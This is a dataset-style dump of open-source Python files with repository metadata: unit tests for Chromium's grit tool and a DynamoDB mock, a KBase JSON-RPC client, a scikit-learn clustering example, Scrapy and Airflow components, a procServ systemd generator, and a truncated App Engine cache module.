repo_name stringlengths 5 100 | path stringlengths 4 375 | copies stringclasses 991
values | size stringlengths 4 7 | content stringlengths 666 1M | license stringclasses 15
values |
|---|---|---|---|---|---|
junhuac/MQUIC | src/tools/grit/grit/tool/transl2tc_unittest.py | 61 | 4893 | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
'''Unit tests for the 'grit transl2tc' tool.'''
import os
import sys
if __name__ == '__main__':
sys.path.append(os.path.join(os.path.dirname(__file__), '../..'))
import StringIO
import unittest
from grit.tool import transl2tc
from grit import grd_reader
from grit import util
def MakeOptions():
from grit import grit_runner
return grit_runner.Options()
class TranslationToTcUnittest(unittest.TestCase):
def testOutput(self):
buf = StringIO.StringIO()
tool = transl2tc.TranslationToTc()
translations = [
['1', 'Hello USERNAME, how are you?'],
['12', 'Howdie doodie!'],
['123', 'Hello\n\nthere\n\nhow are you?'],
['1234', 'Hello is > goodbye but < howdie pardner'],
]
tool.WriteTranslations(buf, translations)
output = buf.getvalue()
self.failUnless(output.strip() == '''
1 Hello USERNAME, how are you?
12 Howdie doodie!
123 Hello
there
how are you?
1234 Hello is > goodbye but < howdie pardner
'''.strip())
def testExtractTranslations(self):
path = util.PathFromRoot('grit/testdata')
current_grd = grd_reader.Parse(StringIO.StringIO('''<?xml version="1.0" encoding="UTF-8"?>
<grit latest_public_release="2" source_lang_id="en-US" current_release="3" base_dir=".">
<release seq="3">
<messages>
<message name="IDS_SIMPLE">
One
</message>
<message name="IDS_PLACEHOLDER">
<ph name="NUMBIRDS">%s<ex>3</ex></ph> birds
</message>
<message name="IDS_PLACEHOLDERS">
<ph name="ITEM">%d<ex>1</ex></ph> of <ph name="COUNT">%d<ex>3</ex></ph>
</message>
<message name="IDS_REORDERED_PLACEHOLDERS">
<ph name="ITEM">$1<ex>1</ex></ph> of <ph name="COUNT">$2<ex>3</ex></ph>
</message>
<message name="IDS_CHANGED">
This is the new version
</message>
<message name="IDS_TWIN_1">Hello</message>
<message name="IDS_TWIN_2">Hello</message>
<message name="IDS_NOT_TRANSLATEABLE" translateable="false">:</message>
<message name="IDS_LONGER_TRANSLATED">
Removed document <ph name="FILENAME">$1<ex>c:\temp</ex></ph>
</message>
<message name="IDS_DIFFERENT_TWIN_1">Howdie</message>
<message name="IDS_DIFFERENT_TWIN_2">Howdie</message>
</messages>
<structures>
<structure type="dialog" name="IDD_ABOUTBOX" encoding="utf-16" file="klonk.rc" />
<structure type="menu" name="IDC_KLONKMENU" encoding="utf-16" file="klonk.rc" />
</structures>
</release>
</grit>'''), path)
current_grd.SetOutputLanguage('en')
current_grd.RunGatherers()
source_rc_path = util.PathFromRoot('grit/testdata/source.rc')
source_rc = util.ReadFile(source_rc_path, util.RAW_TEXT)
transl_rc_path = util.PathFromRoot('grit/testdata/transl.rc')
transl_rc = util.ReadFile(transl_rc_path, util.RAW_TEXT)
tool = transl2tc.TranslationToTc()
output_buf = StringIO.StringIO()
globopts = MakeOptions()
globopts.verbose = True
globopts.output_stream = output_buf
tool.Setup(globopts, [])
translations = tool.ExtractTranslations(current_grd,
source_rc, source_rc_path,
transl_rc, transl_rc_path)
values = translations.values()
output = output_buf.getvalue()
self.failUnless('Ein' in values)
self.failUnless('NUMBIRDS Vogeln' in values)
self.failUnless('ITEM von COUNT' in values)
self.failUnless(values.count('Hallo') == 1)
self.failIf('Dass war die alte Version' in values)
self.failIf(':' in values)
self.failIf('Dokument FILENAME ist entfernt worden' in values)
self.failIf('Nicht verwendet' in values)
self.failUnless(('Howdie' in values or 'Hallo sagt man' in values) and not
('Howdie' in values and 'Hallo sagt man' in values))
self.failUnless('XX01XX&SkraXX02XX&HaettaXX03XXThetta er "Klonk" sem eg fylaXX04XXgonkurinnXX05XXKlonk && er [good]XX06XX&HjalpXX07XX&Um...XX08XX' in values)
self.failUnless('I lagi' in values)
self.failUnless(output.count('Structure of message IDS_REORDERED_PLACEHOLDERS has changed'))
self.failUnless(output.count('Message IDS_CHANGED has changed'))
self.failUnless(output.count('Structure of message IDS_LONGER_TRANSLATED has changed'))
self.failUnless(output.count('Two different translations for "Howdie"'))
self.failUnless(output.count('IDD_DIFFERENT_LENGTH_IN_TRANSL has wrong # of cliques'))
if __name__ == '__main__':
unittest.main()
| mit |
darcyfdu/findlicense | src/packagedcode/utils.py | 5 | 3753 | #
# Copyright (c) 2015 nexB Inc. and others. All rights reserved.
# http://nexb.com and https://github.com/nexB/scancode-toolkit/
# The ScanCode software is licensed under the Apache License version 2.0.
# Data generated with ScanCode require an acknowledgment.
# ScanCode is a trademark of nexB Inc.
#
# You may not use this software except in compliance with the License.
# You may obtain a copy of the License at: http://apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
#
# When you publish or redistribute any data created with ScanCode or any ScanCode
# derivative work, you must accompany this data with the following acknowledgment:
#
# Generated with ScanCode and provided on an "AS IS" BASIS, WITHOUT WARRANTIES
# OR CONDITIONS OF ANY KIND, either express or implied. No content created from
# ScanCode should be considered or used as legal advice. Consult an Attorney
# for any legal advice.
# ScanCode is a free software code scanning tool from nexB Inc. and others.
# Visit https://github.com/nexB/scancode-toolkit/ for support and download.
from __future__ import print_function, absolute_import
VCS_URLS = (
'https://',
'http://',
'git://',
'git+git://',
'hg+https://',
'hg+http://',
'git+https://',
'git+http://',
'svn+https://',
'svn+http://',
'svn://',
)
def parse_repo_url(repo_url):
"""
Validate a repo_ulr and handle shortcuts for GitHub, GitHub gist,
Bitbucket, or GitLab repositories (same syntax as npm install):
See https://docs.npmjs.com/files/package.json#repository
or https://getcomposer.org/doc/05-repositories.md
This is done here in npm:
https://github.com/npm/npm/blob/d3c858ce4cfb3aee515bb299eb034fe1b5e44344/node_modules/hosted-git-info/git-host-info.js
These should be resolved:
npm/npm
gist:11081aaa281
bitbucket:example/repo
gitlab:another/repo
expressjs/serve-static
git://github.com/angular/di.js.git
git://github.com/hapijs/boom
git@github.com:balderdashy/waterline-criteria.git
http://github.com/ariya/esprima.git
http://github.com/isaacs/nopt
https://github.com/chaijs/chai
https://github.com/christkv/kerberos.git
https://gitlab.com/foo/private.git
git@gitlab.com:foo/private.git
"""
is_vcs_url = repo_url.startswith(VCS_URLS)
if is_vcs_url:
# TODO: If we match http and https, we may should add more check in case if the url is not a repo one.
# For example, check the domain name in the url...
return repo_url
if repo_url.startswith('git@'):
left, right = repo_url.split('@', 1)
host, repo = right.split(':', 1)
if any(h in host for h in ['github', 'bitbucket', 'gitlab']):
return 'https://%(host)s/%(repo)s' % locals()
else:
return repo_url
if repo_url.startswith(('bitbucket:', 'gitlab:', 'github:', 'gist:')):
hoster_urls = {
'bitbucket': 'https://bitbucket.org/%(repo)s',
'github': 'https://github.com/%(repo)s',
'gitlab': 'https://gitlab.com/%(repo)s',
'gist': 'https://gist.github.com/%(repo)s',
}
hoster, repo = repo_url.split(':', 1)
return hoster_urls[hoster] % locals()
elif len(repo_url.split('/')) == 2:
# implicit github
return 'https://github.com/%(repo_url)s' % locals()
return repo_url
| apache-2.0 |
dekked/dynamodb-mock | tests/functional/boto/test_list_tables.py | 3 | 1039 | # -*- coding: utf-8 -*-
import unittest
import boto
TABLE_NAME1 = 'Table-1'
TABLE_NAME2 = 'Table-2'
class TestListTables(unittest.TestCase):
def setUp(self):
from ddbmock.database.db import dynamodb
from ddbmock.database.table import Table
from ddbmock.database.key import PrimaryKey
dynamodb.hard_reset()
hash_key = PrimaryKey('hash_key', 'N')
range_key = PrimaryKey('range_key', 'S')
t1 = Table(TABLE_NAME1, 10, 10, hash_key, range_key)
t2 = Table(TABLE_NAME2, 10, 10, hash_key, range_key)
dynamodb.data[TABLE_NAME1] = t1
dynamodb.data[TABLE_NAME2] = t2
def tearDown(self):
from ddbmock.database.db import dynamodb
from ddbmock import clean_boto_patch
dynamodb.hard_reset()
clean_boto_patch()
def test_list_tables(self):
from ddbmock import connect_boto_patch
db = connect_boto_patch()
expected = [TABLE_NAME1, TABLE_NAME2]
self.assertEqual(expected, db.list_tables())
| lgpl-3.0 |
psnovichkov/narrative | src/MG-RAST_ipy-mkmq/ipyMKMQ/genopheno.py | 7 | 10215 | ############################################################
#
# Autogenerated by the KBase type compiler -
# any changes made here will be overwritten
#
# Passes on URLError, timeout, and BadStatusLine exceptions.
# See:
# http://docs.python.org/2/library/urllib2.html
# http://docs.python.org/2/library/httplib.html
#
############################################################
try:
import json
except ImportError:
import sys
sys.path.append('simplejson-2.3.3')
import simplejson as json
import urllib2, httplib, urlparse
from urllib2 import URLError, HTTPError
_CT = 'content-type'
_AJ = 'application/json'
_URL_SCHEME = frozenset(['http', 'https'])
class ServerError(Exception):
def __init__(self, name, code, message):
self.name = name
self.code = code
self.message = message
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message
class Genotype_PhenotypeAPI:
def __init__(self, url, timeout = 30 * 60):
if url is None:
raise ValueError('A url is required')
scheme, _, _, _, _, _ = urlparse.urlparse(url)
if scheme not in _URL_SCHEME:
raise ValueError(url + " isn't a valid http url")
self.url = url
self.timeout = int(timeout)
if self.timeout < 1:
raise ValueError('Timeout value must be at least 1 second')
def get_experiments(self, kb_genome):
arg_hash = { 'method': 'Genotype_PhenotypeAPI.get_experiments',
'params': [kb_genome],
'version': '1.1'
}
body = json.dumps(arg_hash)
try:
ret = urllib2.urlopen(self.url, body, timeout = self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
err = json.loads(h.read())
if 'error' in err:
raise ServerError(**err['error'])
else: #this should never happen... if it does
raise h # h.read() will return '' in the calling code.
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' + ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_traits(self, kb_study_experiment):
arg_hash = { 'method': 'Genotype_PhenotypeAPI.get_traits',
'params': [kb_study_experiment],
'version': '1.1'
}
body = json.dumps(arg_hash)
try:
ret = urllib2.urlopen(self.url, body, timeout = self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
err = json.loads(h.read())
if 'error' in err:
raise ServerError(**err['error'])
else: #this should never happen... if it does
raise h # h.read() will return '' in the calling code.
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' + ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def traits_to_variations(self, trait, pvaluecutoff):
arg_hash = { 'method': 'Genotype_PhenotypeAPI.traits_to_variations',
'params': [trait, pvaluecutoff],
'version': '1.1'
}
body = json.dumps(arg_hash)
try:
ret = urllib2.urlopen(self.url, body, timeout = self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
err = json.loads(h.read())
if 'error' in err:
raise ServerError(**err['error'])
else: #this should never happen... if it does
raise h # h.read() will return '' in the calling code.
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' + ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def chromosome_position_from_variation_details(self, variation_details):
arg_hash = { 'method': 'Genotype_PhenotypeAPI.chromosome_position_from_variation_details',
'params': [variation_details],
'version': '1.1'
}
body = json.dumps(arg_hash)
try:
ret = urllib2.urlopen(self.url, body, timeout = self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
err = json.loads(h.read())
if 'error' in err:
raise ServerError(**err['error'])
else: #this should never happen... if it does
raise h # h.read() will return '' in the calling code.
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' + ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def traits_to_genes(self, trait, pvaluecutoff, distance):
arg_hash = { 'method': 'Genotype_PhenotypeAPI.traits_to_genes',
'params': [trait, pvaluecutoff, distance],
'version': '1.1'
}
body = json.dumps(arg_hash)
try:
ret = urllib2.urlopen(self.url, body, timeout = self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
err = json.loads(h.read())
if 'error' in err:
raise ServerError(**err['error'])
else: #this should never happen... if it does
raise h # h.read() will return '' in the calling code.
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' + ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def variations_to_genes(self, chromosomal_positions, distance):
arg_hash = { 'method': 'Genotype_PhenotypeAPI.variations_to_genes',
'params': [chromosomal_positions, distance],
'version': '1.1'
}
body = json.dumps(arg_hash)
try:
ret = urllib2.urlopen(self.url, body, timeout = self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
err = json.loads(h.read())
if 'error' in err:
raise ServerError(**err['error'])
else: #this should never happen... if it does
raise h # h.read() will return '' in the calling code.
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' + ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def find_common_snps(self, trait_list_pvalue):
arg_hash = { 'method': 'Genotype_PhenotypeAPI.find_common_snps',
'params': [trait_list_pvalue],
'version': '1.1'
}
body = json.dumps(arg_hash)
try:
ret = urllib2.urlopen(self.url, body, timeout = self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
err = json.loads(h.read())
if 'error' in err:
raise ServerError(**err['error'])
else: #this should never happen... if it does
raise h # h.read() will return '' in the calling code.
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' + ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def selected_locations_to_genes(self, trait, pmin, pmax, chromosomal_locations, distance):
arg_hash = { 'method': 'Genotype_PhenotypeAPI.selected_locations_to_genes',
'params': [trait, pmin, pmax, chromosomal_locations, distance],
'version': '1.1'
}
body = json.dumps(arg_hash)
try:
ret = urllib2.urlopen(self.url, body, timeout = self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
err = json.loads(h.read())
if 'error' in err:
raise ServerError(**err['error'])
else: #this should never happen... if it does
raise h # h.read() will return '' in the calling code.
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' + ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
| mit |
harshaneelhg/scikit-learn | examples/cluster/plot_digits_linkage.py | 369 | 2959 | """
=============================================================================
Various Agglomerative Clustering on a 2D embedding of digits
=============================================================================
An illustration of various linkage option for agglomerative clustering on
a 2D embedding of the digits dataset.
The goal of this example is to show intuitively how the metrics behave, and
not to find good clusters for the digits. This is why the example works on a
2D embedding.
What this example shows us is the behavior "rich getting richer" of
agglomerative clustering that tends to create uneven cluster sizes.
This behavior is especially pronounced for the average linkage strategy,
that ends up with a couple of singleton clusters.
"""
# Authors: Gael Varoquaux
# License: BSD 3 clause (C) INRIA 2014
print(__doc__)
from time import time
import numpy as np
from scipy import ndimage
from matplotlib import pyplot as plt
from sklearn import manifold, datasets
digits = datasets.load_digits(n_class=10)
X = digits.data
y = digits.target
n_samples, n_features = X.shape
np.random.seed(0)
def nudge_images(X, y):
# Having a larger dataset shows more clearly the behavior of the
# methods, but we multiply the size of the dataset only by 2, as the
# cost of the hierarchical clustering methods are strongly
# super-linear in n_samples
shift = lambda x: ndimage.shift(x.reshape((8, 8)),
.3 * np.random.normal(size=2),
mode='constant',
).ravel()
X = np.concatenate([X, np.apply_along_axis(shift, 1, X)])
Y = np.concatenate([y, y], axis=0)
return X, Y
X, y = nudge_images(X, y)
#----------------------------------------------------------------------
# Visualize the clustering
def plot_clustering(X_red, X, labels, title=None):
x_min, x_max = np.min(X_red, axis=0), np.max(X_red, axis=0)
X_red = (X_red - x_min) / (x_max - x_min)
plt.figure(figsize=(6, 4))
for i in range(X_red.shape[0]):
plt.text(X_red[i, 0], X_red[i, 1], str(y[i]),
color=plt.cm.spectral(labels[i] / 10.),
fontdict={'weight': 'bold', 'size': 9})
plt.xticks([])
plt.yticks([])
if title is not None:
plt.title(title, size=17)
plt.axis('off')
plt.tight_layout()
#----------------------------------------------------------------------
# 2D embedding of the digits dataset
print("Computing embedding")
X_red = manifold.SpectralEmbedding(n_components=2).fit_transform(X)
print("Done.")
from sklearn.cluster import AgglomerativeClustering
for linkage in ('ward', 'average', 'complete'):
clustering = AgglomerativeClustering(linkage=linkage, n_clusters=10)
t0 = time()
clustering.fit(X_red)
print("%s : %.2fs" % (linkage, time() - t0))
plot_clustering(X_red, X, clustering.labels_, "%s linkage" % linkage)
plt.show()
| bsd-3-clause |
yidongliu/scrapy | scrapy/downloadermiddlewares/decompression.py | 151 | 2629 | """ This module implements the DecompressionMiddleware which tries to recognise
and extract the potentially compressed responses that may arrive.
"""
import bz2
import gzip
import zipfile
import tarfile
import logging
from tempfile import mktemp
import six
try:
from cStringIO import StringIO as BytesIO
except ImportError:
from io import BytesIO
from scrapy.responsetypes import responsetypes
logger = logging.getLogger(__name__)
class DecompressionMiddleware(object):
""" This middleware tries to recognise and extract the possibly compressed
responses that may arrive. """
def __init__(self):
self._formats = {
'tar': self._is_tar,
'zip': self._is_zip,
'gz': self._is_gzip,
'bz2': self._is_bzip2
}
def _is_tar(self, response):
archive = BytesIO(response.body)
try:
tar_file = tarfile.open(name=mktemp(), fileobj=archive)
except tarfile.ReadError:
return
body = tar_file.extractfile(tar_file.members[0]).read()
respcls = responsetypes.from_args(filename=tar_file.members[0].name, body=body)
return response.replace(body=body, cls=respcls)
def _is_zip(self, response):
archive = BytesIO(response.body)
try:
zip_file = zipfile.ZipFile(archive)
except zipfile.BadZipfile:
return
namelist = zip_file.namelist()
body = zip_file.read(namelist[0])
respcls = responsetypes.from_args(filename=namelist[0], body=body)
return response.replace(body=body, cls=respcls)
def _is_gzip(self, response):
archive = BytesIO(response.body)
try:
body = gzip.GzipFile(fileobj=archive).read()
except IOError:
return
respcls = responsetypes.from_args(body=body)
return response.replace(body=body, cls=respcls)
def _is_bzip2(self, response):
try:
body = bz2.decompress(response.body)
except IOError:
return
respcls = responsetypes.from_args(body=body)
return response.replace(body=body, cls=respcls)
def process_response(self, request, response, spider):
if not response.body:
return response
for fmt, func in six.iteritems(self._formats):
new_response = func(response)
if new_response:
logger.debug('Decompressed response with format: %(responsefmt)s',
{'responsefmt': fmt}, extra={'spider': spider})
return new_response
return response
| bsd-3-clause |
subodhchhabra/airflow | airflow/contrib/hooks/azure_data_lake_hook.py | 11 | 6396 | # -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from airflow.hooks.base_hook import BaseHook
from azure.datalake.store import core, lib, multithread
class AzureDataLakeHook(BaseHook):
"""
Interacts with Azure Data Lake.
Client ID and client secret should be in user and password parameters.
Tenant and account name should be extra field as
{"tenant": "<TENANT>", "account_name": "ACCOUNT_NAME"}.
:param azure_data_lake_conn_id: Reference to the Azure Data Lake connection.
:type azure_data_lake_conn_id: str
"""
def __init__(self, azure_data_lake_conn_id='azure_data_lake_default'):
self.conn_id = azure_data_lake_conn_id
self.connection = self.get_conn()
def get_conn(self):
"""Return a AzureDLFileSystem object."""
conn = self.get_connection(self.conn_id)
service_options = conn.extra_dejson
self.account_name = service_options.get('account_name')
adlCreds = lib.auth(tenant_id=service_options.get('tenant'),
client_secret=conn.password,
client_id=conn.login)
adlsFileSystemClient = core.AzureDLFileSystem(adlCreds,
store_name=self.account_name)
adlsFileSystemClient.connect()
return adlsFileSystemClient
def check_for_file(self, file_path):
"""
Check if a file exists on Azure Data Lake.
:param file_path: Path and name of the file.
:type file_path: str
:return: True if the file exists, False otherwise.
:rtype bool
"""
try:
files = self.connection.glob(file_path, details=False, invalidate_cache=True)
return len(files) == 1
except FileNotFoundError:
return False
def upload_file(self, local_path, remote_path, nthreads=64, overwrite=True,
buffersize=4194304, blocksize=4194304):
"""
Upload a file to Azure Data Lake.
:param local_path: local path. Can be single file, directory (in which case,
upload recursively) or glob pattern. Recursive glob patterns using `**`
are not supported.
:type local_path: str
:param remote_path: Remote path to upload to; if multiple files, this is the
dircetory root to write within.
:type remote_path: str
:param nthreads: Number of threads to use. If None, uses the number of cores.
:type nthreads: int
:param overwrite: Whether to forcibly overwrite existing files/directories.
If False and remote path is a directory, will quit regardless if any files
would be overwritten or not. If True, only matching filenames are actually
overwritten.
:type overwrite: bool
:param buffersize: int [2**22]
Number of bytes for internal buffer. This block cannot be bigger than
a chunk and cannot be smaller than a block.
:type buffersize: int
:param blocksize: int [2**22]
Number of bytes for a block. Within each chunk, we write a smaller
block for each API call. This block cannot be bigger than a chunk.
:type blocksize: int
"""
multithread.ADLUploader(self.connection,
lpath=local_path,
rpath=remote_path,
nthreads=nthreads,
overwrite=overwrite,
buffersize=buffersize,
blocksize=blocksize)
def download_file(self, local_path, remote_path, nthreads=64, overwrite=True,
buffersize=4194304, blocksize=4194304):
"""
Download a file from Azure Blob Storage.
:param local_path: local path. If downloading a single file, will write to this
specific file, unless it is an existing directory, in which case a file is
created within it. If downloading multiple files, this is the root
directory to write within. Will create directories as required.
:type local_path: str
:param remote_path: remote path/globstring to use to find remote files.
Recursive glob patterns using `**` are not supported.
:type remote_path: str
:param nthreads: Number of threads to use. If None, uses the number of cores.
:type nthreads: int
:param overwrite: Whether to forcibly overwrite existing files/directories.
If False and remote path is a directory, will quit regardless if any files
would be overwritten or not. If True, only matching filenames are actually
overwritten.
:type overwrite: bool
:param buffersize: int [2**22]
Number of bytes for internal buffer. This block cannot be bigger than
a chunk and cannot be smaller than a block.
:type buffersize: int
:param blocksize: int [2**22]
Number of bytes for a block. Within each chunk, we write a smaller
block for each API call. This block cannot be bigger than a chunk.
:type blocksize: int
"""
multithread.ADLDownloader(self.connection,
lpath=local_path,
rpath=remote_path,
nthreads=nthreads,
overwrite=overwrite,
buffersize=buffersize,
blocksize=blocksize)
| apache-2.0 |
tsheasha/fullerite | src/diamond/collectors/powerdns/test/testpowerdns.py | 35 | 2834 | #!/usr/bin/python
# coding=utf-8
################################################################################
from test import CollectorTestCase
from test import get_collector_config
from test import unittest
from mock import Mock
from mock import patch
from diamond.collector import Collector
from powerdns import PowerDNSCollector
################################################################################
class TestPowerDNSCollector(CollectorTestCase):
def setUp(self):
config = get_collector_config('PowerDNSCollector', {
'interval': 1,
'bin': 'true',
'use_sudo': False,
})
self.collector = PowerDNSCollector(config, None)
def test_import(self):
self.assertTrue(PowerDNSCollector)
@patch('os.access', Mock(return_value=True))
@patch.object(Collector, 'publish')
def test_should_work_with_fake_data(self, publish_mock):
patch_communicate = patch(
'subprocess.Popen.communicate',
Mock(return_value=(
self.getFixture(
'pdns_control-2.9.22.6-1.el6-A'
).getvalue(),
'')))
patch_communicate.start()
self.collector.collect()
patch_communicate.stop()
self.assertPublishedMany(publish_mock, {})
patch_communicate = patch(
'subprocess.Popen.communicate',
Mock(return_value=(
self.getFixture('pdns_control-2.9.22.6-1.el6-B').getvalue(),
'')))
patch_communicate.start()
self.collector.collect()
patch_communicate.stop()
metrics = {
'corrupt-packets': 1.0,
'deferred-cache-inserts': 2.0,
'deferred-cache-lookup': 3.0,
'latency': 4.0,
'packetcache-hit': 5.0,
'packetcache-miss': 6.0,
'packetcache-size': 7.0,
'qsize-q': 8.0,
'query-cache-hit': 9.0,
'query-cache-miss': 10.0,
'recursing-answers': 11.0,
'recursing-questions': 12.0,
'servfail-packets': 13.0,
'tcp-answers': 14.0,
'tcp-queries': 15.0,
'timedout-packets': 16.0,
'udp-answers': 17.0,
'udp-queries': 18.0,
'udp4-answers': 19.0,
'udp4-queries': 20.0,
'udp6-answers': 21.0,
'udp6-queries': 22.0,
}
self.setDocExample(collector=self.collector.__class__.__name__,
metrics=metrics,
defaultpath=self.collector.config['path'])
self.assertPublishedMany(publish_mock, metrics)
################################################################################
if __name__ == "__main__":
unittest.main()
| apache-2.0 |
ralphlange/procServ | procServUtils/generator.py | 1 | 1903 |
import logging
_log = logging.getLogger(__name__)
import sys, os, errno
from .conf import getconf
def which(file):
for path in os.environ["PATH"].split(os.pathsep):
if os.path.exists(os.path.join(path, file)):
return os.path.join(path, file)
return None
def write_service(F, conf, sect, user=False):
opts = {
'name':sect,
'user':conf.get(sect, 'user'),
'group':conf.get(sect, 'group'),
'chdir':conf.get(sect, 'chdir'),
'userarg':'--user' if user else '--system',
'launcher':which('procServ-launcher'),
}
F.write("""
[Unit]
Description=procServ for %(name)s
After=network.target remote-fs.target
ConditionPathIsDirectory=%(chdir)s
"""%opts)
if conf.has_option(sect, 'host'):
F.write('ConditionHost=%s\n'%conf.get(sect, 'host'))
F.write("""
[Service]
Type=simple
"""%opts)
if conf.has_option(sect, 'env_file'):
F.write('EnvironmentFile=%s\n'%conf.get(sect, 'env_file'))
if conf.has_option(sect, 'environment'):
F.write('Environment=%s\n'%conf.get(sect, 'environment'))
F.write("""\
ExecStart=%(launcher)s %(userarg)s %(name)s
RuntimeDirectory=procserv-%(name)s
StandardOutput=syslog
StandardError=inherit
SyslogIdentifier=procserv-%(name)s
"""%opts)
if not user:
F.write("""
User=%(user)s
Group=%(group)s
"""%opts)
F.write("""
[Install]
WantedBy=multi-user.target
"""%opts)
def run(outdir, user=False):
conf = getconf(user=user)
for sect in conf.sections():
_log.debug('Consider %s', sect)
if not conf.getboolean(sect, 'instance'):
continue
service = 'procserv-%s.service'%sect
ofile = os.path.join(outdir, service)
_log.debug('Write %s', service)
with open(ofile+'.tmp', 'w') as F:
write_service(F, conf, sect, user=user)
os.rename(ofile+'.tmp', ofile)
| gpl-3.0 |
gonboy/sl4a | python-build/python-libs/gdata/samples/oauth/oauth_on_appengine/appengine_utilities/cache.py | 129 | 9763 | # -*- coding: utf-8 -*-
"""
Copyright (c) 2008, appengine-utilities project
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
- Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
- Neither the name of the appengine-utilities project nor the names of its
contributors may be used to endorse or promote products derived from this
software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
# main python imports
import datetime
import pickle
import random
import __main__
# google appengine import
from google.appengine.ext import db
from google.appengine.api import memcache
# settings
DEFAULT_TIMEOUT = 3600 # cache expires after one hour (3600 sec)
CLEAN_CHECK_PERCENT = 50 # 15% of all requests will clean the database
MAX_HITS_TO_CLEAN = 100 # the maximum number of cache hits to clean on attempt
class _AppEngineUtilities_Cache(db.Model):
# It's up to the application to determine the format of their keys
cachekey = db.StringProperty()
createTime = db.DateTimeProperty(auto_now_add=True)
timeout = db.DateTimeProperty()
value = db.BlobProperty()
class Cache(object):
"""
Cache is used for storing pregenerated output and/or objects in the Big
Table datastore to minimize the amount of queries needed for page
displays. The idea is that complex queries that generate the same
results really should only be run once. Cache can be used to store
pregenerated value made from queries (or other calls such as
urlFetch()), or the query objects themselves.
"""
def __init__(self, clean_check_percent = CLEAN_CHECK_PERCENT,
max_hits_to_clean = MAX_HITS_TO_CLEAN,
default_timeout = DEFAULT_TIMEOUT):
"""
Initializer
Args:
clean_check_percent: how often cache initialization should
run the cache cleanup
max_hits_to_clean: maximum number of stale hits to clean
default_timeout: default length a cache item is good for
"""
self.clean_check_percent = clean_check_percent
self.max_hits_to_clean = max_hits_to_clean
self.default_timeout = default_timeout
if random.randint(1, 100) < self.clean_check_percent:
self._clean_cache()
if 'AEU_Events' in __main__.__dict__:
__main__.AEU_Events.fire_event('cacheInitialized')
def _clean_cache(self):
"""
_clean_cache is a routine that is run to find and delete cache
